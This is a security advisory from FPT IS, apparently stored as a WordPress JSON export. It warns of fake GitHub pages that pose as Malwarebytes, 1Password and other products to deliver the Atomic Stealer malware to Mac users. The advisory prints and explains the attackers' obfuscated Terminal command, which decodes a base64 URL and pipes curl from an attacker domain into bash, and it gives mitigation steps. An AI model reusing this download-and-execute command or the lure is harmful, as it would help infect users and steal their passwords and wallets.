{"id":23245,"date":"2025-11-25T09:00:00","date_gmt":"2025-11-25T02:00:00","guid":{"rendered":"https:\/\/fpt-is.com\/en\/?post_type=goc_nhin_so&#038;p=23245"},"modified":"2026-01-20T10:27:05","modified_gmt":"2026-01-20T03:27:05","slug":"fake-software-on-github-targets-mac-users","status":"publish","type":"goc_nhin_so","link":"https:\/\/fpt-is.com\/en\/insights\/fake-software-on-github-targets-mac-users\/","title":{"rendered":"Warning: Fake Software on GitHub Targets Mac Users"},"content":{"rendered":"<div id=\"post-content-wrapper\" class=\"prose prose-base mx-auto mb-10 min-h-30 break-words dark:prose-dark lg:prose-lg\">\n<p><span style=\"font-family: arial, helvetica, sans-serif;font-size: 12pt\">Recently, security experts from Malwarebytes issued a\u00a0<a href=\"https:\/\/www.malwarebytes.com\/blog\/news\/2025\/09\/fake-malwarebytes-lastpass-and-others-on-github-serve-malware\" target=\"_blank\" rel=\"noopener nofollow\">warning<\/a>\u00a0about a widespread fake software distribution campaign happening on GitHub, targeting macOS users. The attackers have exploited the names of reputable brands to create fake download pages, spreading malware capable of stealing information.<\/span><\/p>\n<p><span style=\"font-family: arial, helvetica, sans-serif;font-size: 12pt\">Notably, some popular software like 1Password, Docker, Gemini Malwarebytes, Notion, and others are among the software being impersonated, making the campaign extremely dangerous as users may unknowingly install malicious software themselves.<\/span><\/p>\n<h3 id=\"heading-detailed-information\" class=\"permalink-heading\"><span style=\"font-family: arial, helvetica, sans-serif;font-size: 12pt\">Detailed Information<\/span><\/h3>\n<p><span style=\"font-family: arial, helvetica, sans-serif;font-size: 12pt\">This phishing campaign uses Atomic Stealer (AMOS) \u2013 a type of malware that specializes in stealing information from Mac users. Notably, the attackers do not try to exploit complex vulnerabilities in the operating system; instead, they find an easier way: tricking users into installing fake software themselves.<\/span><\/p>\n<p><span style=\"font-family: arial, helvetica, sans-serif;font-size: 12pt\">To achieve this, they set up GitHub pages that look exactly like the official developer pages. Many people find it difficult to tell the real from the fake because the pages are fully designed with information, download buttons, and even detailed installation instructions.<\/span><\/p>\n<p><span style=\"font-family: arial, helvetica, sans-serif;font-size: 12pt\">This campaign often starts with sponsored Google ads or SEO tricks &#8211; Search Engine Optimization. This means that when users search for keywords like \u201cMalwarebytes Github MacOS,\u201d fake links are likely to appear at the top of the results page. Trusting the ads or top results, users easily click without suspecting anything.<\/span><\/p>\n<p><span style=\"font-family: arial, helvetica, sans-serif;font-size: 12pt\" data-rmiz=\"\"><a href=\"https:\/\/cdn.fpt-is.com\/en\/sites\/3\/2025\/11\/698f05ba-def0-43e2-83fc-c1b3672e5af4-1762414009.jpg\"><img decoding=\"async\" class=\"aligncenter size-full wp-image-23246\" src=\"https:\/\/cdn.fpt-is.com\/en\/sites\/3\/2025\/11\/698f05ba-def0-43e2-83fc-c1b3672e5af4-1762414009.jpg\" alt=\"698f05ba Def0 43e2 83fc C1b3672e5af4 1762414009\" width=\"737\" height=\"466\" srcset=\"https:\/\/cdn.fpt-is.com\/en\/sites\/3\/2025\/11\/698f05ba-def0-43e2-83fc-c1b3672e5af4-1762414009.jpg 737w, https:\/\/cdn.fpt-is.com\/en\/sites\/3\/2025\/11\/698f05ba-def0-43e2-83fc-c1b3672e5af4-1762414009-700x443.jpg 700w\" sizes=\"(max-width: 737px) 100vw, 737px\" \/><\/a><\/span><span style=\"font-family: arial, helvetica, sans-serif;font-size: 12pt\">In the case of Malwarebytes, when users access the fake GitHub page for this software, they will see a familiar button like &#8220;GET MALWAREBYTES.&#8221; By clicking on it, they are taken to a download page with installation instructions.<\/span><\/p>\n<p><span style=\"font-family: arial, helvetica, sans-serif;font-size: 12pt\">In the instructions, the attacker often asks users to run a command in Terminal\u2014the command-line tool on macOS. At first glance, it seems like a simple command, but in reality, it downloads a script from an external server and executes it immediately. In other words, users are unwittingly opening the door for the attacker.<\/span><\/p>\n<p><span style=\"font-family: arial, helvetica, sans-serif;font-size: 12pt\" data-rmiz=\"\"><a href=\"https:\/\/cdn.fpt-is.com\/en\/sites\/3\/2025\/11\/b1d339c7-09ae-4a88-9fa6-b306245239e8-1762414144.jpg\"><img decoding=\"async\" class=\"aligncenter size-full wp-image-23247\" src=\"https:\/\/cdn.fpt-is.com\/en\/sites\/3\/2025\/11\/b1d339c7-09ae-4a88-9fa6-b306245239e8-1762414144.jpg\" alt=\"B1d339c7 09ae 4a88 9fa6 B306245239e8 1762414144\" width=\"1001\" height=\"661\" srcset=\"https:\/\/cdn.fpt-is.com\/en\/sites\/3\/2025\/11\/b1d339c7-09ae-4a88-9fa6-b306245239e8-1762414144.jpg 1001w, https:\/\/cdn.fpt-is.com\/en\/sites\/3\/2025\/11\/b1d339c7-09ae-4a88-9fa6-b306245239e8-1762414144-700x462.jpg 700w\" sizes=\"(max-width: 1001px) 100vw, 1001px\" \/><\/a><\/span><span style=\"font-family: arial, helvetica, sans-serif;font-size: 12pt\">The image above is an example of a command used by hackers. The command can be broken down and explained as follows:<\/span><\/p>\n<ol>\n<li><span style=\"font-family: arial, helvetica, sans-serif;font-size: 12pt\"><code>\/bin\/bash -c \"&lt;something&gt;\"<\/code>\u00a0runs a command using the Bash shell on macOS or Linux. Bash is the interpreter for shell commands.<\/span><\/li>\n<li><span style=\"font-family: arial, helvetica, sans-serif;font-size: 12pt\">The part in quotes uses\u00a0<code>$( ... )<\/code>. Everything inside will be executed first; its output becomes part of the outer command.<\/span><\/li>\n<li><span style=\"font-family: arial, helvetica, sans-serif;font-size: 12pt\"><code>$(echo aHR0cHM6Ly9nb3NyZWVzdHIuY29tL2h1bi9pbnN0YWxsLnNo | base64 -d)<\/code>\u00a0decodes the long string using the\u00a0<code>base64 -d<\/code>\u00a0command.<\/span><\/li>\n<li><span style=\"font-family: arial, helvetica, sans-serif;font-size: 12pt\"><code>curl -fsSL<\/code>\u00a0is a command to download data from the web. The options mean:<\/span>\n<ul>\n<li><span style=\"font-family: arial, helvetica, sans-serif;font-size: 12pt\"><code>-f<\/code>: Fail silently on HTTP errors. This means if there are error messages like 404, 500, etc., instead of displaying the usual error message, the command will return an exit code or terminate the running command.<\/span><\/li>\n<li><span style=\"font-family: arial, helvetica, sans-serif;font-size: 12pt\"><code>-s<\/code>: Silent mode (does not show the progress bar).<\/span><\/li>\n<li><span style=\"font-family: arial, helvetica, sans-serif;font-size: 12pt\"><code>-S<\/code>: Show errors if\u00a0<code>-s<\/code>\u00a0is used.<\/span><\/li>\n<li><span style=\"font-family: arial, helvetica, sans-serif;font-size: 12pt\"><code>-L<\/code>: Follow redirects.<\/span><\/li>\n<\/ul>\n<\/li>\n<\/ol>\n<p><span style=\"font-family: arial, helvetica, sans-serif;font-size: 12pt\">When combining all these elements together, we get:<\/span><\/p>\n<ul>\n<li><span style=\"font-family: arial, helvetica, sans-serif;font-size: 12pt\">The inner command becomes:\u00a0<code>curl -fsSL<\/code>\u00a0<a href=\"https:\/\/gosreestr[.]com\/hun\/install.sh\" target=\"_blank\" rel=\"noopener nofollow\"><code>https:\/\/gosreestr[.]com\/hun\/install.sh<\/code><\/a><\/span><\/li>\n<li><span style=\"font-family: arial, helvetica, sans-serif;font-size: 12pt\">The outer command becomes:\u00a0<code>\/bin\/bash -c \"$(curl -fsSL<\/code>\u00a0<a href=\"https:\/\/gosreestr[.]com\/hun\/install.sh\" target=\"_blank\" rel=\"noopener nofollow\"><code>https:\/\/gosreestr[.]com\/hun\/install.sh<\/code><\/a><code>)\"<\/code><\/span><\/li>\n<\/ul>\n<p><span style=\"font-family: arial, helvetica, sans-serif;font-size: 12pt\">This means that the complete command instructs the system to download a script directly from an external server and immediately execute it using Bash. The scary part is that this process happens without any warnings or confirmation steps, the user does not get to see what the script contains, and there is no chance to refuse before it runs. This way, malware can easily bypass many of the system&#8217;s usual defenses.<\/span><\/p>\n<p><span style=\"font-family: arial, helvetica, sans-serif;font-size: 12pt\">Once infiltrated, Atomic Stealer can steal passwords, login information, cryptocurrency wallet data, and sensitive files. It can also install additional components to maintain long-term control of the computer.<\/span><\/p>\n<p><span style=\"font-family: arial, helvetica, sans-serif;font-size: 12pt\">Not only is Malwarebytes being impersonated, but other familiar software like LastPass, 1Password, Gemini, Notion, etc., are also on the list. These software are trusted by many individuals and businesses, increasing the risk of spread and the number of potential victims. And certainly, this list is not final\u2014the attacker can easily expand to other popular software.<\/span><\/p>\n<p><span style=\"font-family: arial, helvetica, sans-serif;font-size: 12pt\">This campaign highlights a worrying reality: users&#8217; trust in search results and code-hosting platforms like GitHub has been thoroughly exploited. If users rely solely on the habit of searching and clicking the first link, they can fall into a trap without realizing it.<\/span><\/p>\n<h3 id=\"heading-mitigation-amp-recommendations\" class=\"permalink-heading\"><span style=\"font-family: arial, helvetica, sans-serif;font-size: 12pt\">Mitigation &amp; Recommendations<\/span><\/h3>\n<p><span style=\"font-family: arial, helvetica, sans-serif;font-size: 12pt\">General users follow these safety guidelines:<\/span><\/p>\n<ol>\n<li><span style=\"font-family: arial, helvetica, sans-serif;font-size: 12pt\"><strong>Do not run copy-paste commands:<\/strong>\u00a0Never copy and run commands from unclear sources, especially commands like\u00a0<code>curl \u2026 | bash<\/code>.<\/span><\/li>\n<li><span style=\"font-family: arial, helvetica, sans-serif;font-size: 12pt\"><strong>Use software from official sites:<\/strong>\u00a0Access and use software from the developer&#8217;s official website, and verify the download link if necessary.<\/span><\/li>\n<li><span style=\"font-family: arial, helvetica, sans-serif;font-size: 12pt\"><strong>Avoid clicking on ad results:<\/strong>\u00a0Avoid clicking on advertised links in search results as they may be traps set by attackers.<\/span><\/li>\n<li><span style=\"font-family: arial, helvetica, sans-serif;font-size: 12pt\"><strong>Use security solutions:<\/strong>\u00a0Use security software with web protection features to block fake sites from the start.<\/span><\/li>\n<\/ol>\n<p><span style=\"font-family: arial, helvetica, sans-serif;font-size: 12pt\">In case of suspicion or infection, Malwarebytes cybersecurity experts also recommend that macOS users take the following remediation steps:<\/span><\/p>\n<ol>\n<li><span style=\"font-family: arial, helvetica, sans-serif;font-size: 12pt\"><strong>Scan the system:<\/strong>\u00a0Scan the entire system and remove suspicious LaunchAgents, LaunchDaemons, and startup items in the Library.<\/span><\/li>\n<li><span style=\"font-family: arial, helvetica, sans-serif;font-size: 12pt\"><strong>Reinstall the system:<\/strong>\u00a0If unusual signs persist, perform a clean reinstall of macOS and only restore data from a reliable backup.<\/span><\/li>\n<li><span style=\"font-family: arial, helvetica, sans-serif;font-size: 12pt\"><strong>Change passwords:<\/strong>\u00a0After reinstalling the system, users should change all passwords and enable two-factor authentication (MFA) for important accounts.<\/span><\/li>\n<\/ol>\n<h3 id=\"heading-references\" class=\"permalink-heading\"><span style=\"font-family: arial, helvetica, sans-serif;font-size: 12pt\">References<\/span><\/h3>\n<ol>\n<li><span style=\"font-family: arial, helvetica, sans-serif;font-size: 12pt\"><a href=\"https:\/\/www.malwarebytes.com\/blog\/news\/2025\/09\/fake-malwarebytes-lastpass-and-others-on-github-serve-malware\" target=\"_blank\" rel=\"noopener nofollow\">https:\/\/www.malwarebytes.com\/blog\/news\/2025\/09\/fake-malwarebytes-lastpass-and-others-on-github-serve-malware<\/a><\/span><\/li>\n<\/ol>\n<\/div>\n<div class=\"-mt-5 mb-10\">\n<table style=\"border-collapse: collapse;width: 100%\">\n<tbody>\n<tr>\n<td style=\"width: 100%\"><span style=\"font-family: arial, helvetica, sans-serif\"><strong>Exclusive article by FPT IS Technology Experts<\/strong><\/span><\/p>\n<p><em style=\"font-family: arial, helvetica, sans-serif;font-size: inherit\">Nam Anh Mai D. \u2013 FPT IS Cyber Security Center<\/em><\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<\/div>\n","protected":false},"author":21,"featured_media":23248,"parent":0,"template":"","nang_luc":[790,821],"danh_muc_goc_nhin_so":[789],"dich_vu":[712],"linh_vuc":[],"platform":[],"san_pham":[],"the_goc_nhin_so":[],"class_list":["post-23245","goc_nhin_so","type-goc_nhin_so","status-publish","has-post-thumbnail","hentry","nang_luc-experts-sharing","nang_luc-security","danh_muc_goc_nhin_so-expert-sharing","dich_vu-security"],"acf":[],"_links":{"self":[{"href":"https:\/\/fpt-is.com\/en\/wp-json\/wp\/v2\/goc_nhin_so\/23245","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/fpt-is.com\/en\/wp-json\/wp\/v2\/goc_nhin_so"}],"about":[{"href":"https:\/\/fpt-is.com\/en\/wp-json\/wp\/v2\/types\/goc_nhin_so"}],"author":[{"embeddable":true,"href":"https:\/\/fpt-is.com\/en\/wp-json\/wp\/v2\/users\/21"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/fpt-is.com\/en\/wp-json\/wp\/v2\/media\/23248"}],"wp:attachment":[{"href":"https:\/\/fpt-is.com\/en\/wp-json\/wp\/v2\/media?parent=23245"}],"wp:term":[{"taxonomy":"nang_luc","embeddable":true,"href":"https:\/\/fpt-is.com\/en\/wp-json\/wp\/v2\/nang_luc?post=23245"},{"taxonomy":"danh_muc_goc_nhin_so","embeddable":true,"href":"https:\/\/fpt-is.com\/en\/wp-json\/wp\/v2\/danh_muc_goc_nhin_so?post=23245"},{"taxonomy":"dich_vu","embeddable":true,"href":"https:\/\/fpt-is.com\/en\/wp-json\/wp\/v2\/dich_vu?post=23245"},{"taxonomy":"linh_vuc","embeddable":true,"href":"https:\/\/fpt-is.com\/en\/wp-json\/wp\/v2\/linh_vuc?post=23245"},{"taxonomy":"platform","embeddable":true,"href":"https:\/\/fpt-is.com\/en\/wp-json\/wp\/v2\/platform?post=23245"},{"taxonomy":"san_pham","embeddable":true,"href":"https:\/\/fpt-is.com\/en\/wp-json\/wp\/v2\/san_pham?post=23245"},{"taxonomy":"the_goc_nhin_so","embeddable":true,"href":"https:\/\/fpt-is.com\/en\/wp-json\/wp\/v2\/the_goc_nhin_so?post=23245"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}